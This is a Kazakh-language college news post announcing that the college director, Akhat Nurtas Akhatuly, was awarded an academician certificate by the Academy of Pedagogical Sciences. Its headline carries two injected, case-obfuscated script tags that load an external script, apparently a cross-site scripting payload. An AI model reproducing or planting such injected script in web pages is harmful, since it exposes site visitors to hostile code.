Педагогикалық Ғылымдар Академиясының академигі куәлігі табысталды!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
07.06.2021
2021 жылдың 5 мамыр күні Алматы қаласында Aкадемик А.Қ.Құсайыновтың 70 жылдық мерейтойына арналған «Әлемдік білім кеңістігіндегі оқыту мен тәрбиелеудің жаңа көкжиектері» атты Халықаралық ғылыми-практикалық конференциясында колледжіміздің директоры Нұртас Ахатұлына Педагогика Ғылымдар Академиясының академигі куәлігі табысталды. Айта кету керек, ағымдағы жылдың 23 сәуір күні Педагогикалық Ғылымдар Академиясының кезекті ХХІІ Cессиясында Академия Президиумының ұсынысы бойынша педагогика ғылымы мен білімді дамытуға қосқан елеулі үлесі үшін Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің директоры, филология ғылымдарының кандидаты, Қазақстанның еңбек сіңірген ұстазы Ахат Нұртас Ахатұлы Педагогикалық Ғылымдар Академиясының толық мүшесі болып сайланды! Педагогикалық Ғылымдар Академиясының академигі атануымен шын жүректен құттықтаймыз! Білім мен ғылымды дамыту жолындағы еңбегіңізге толағай табыс тілейміз!
Просмотров: 519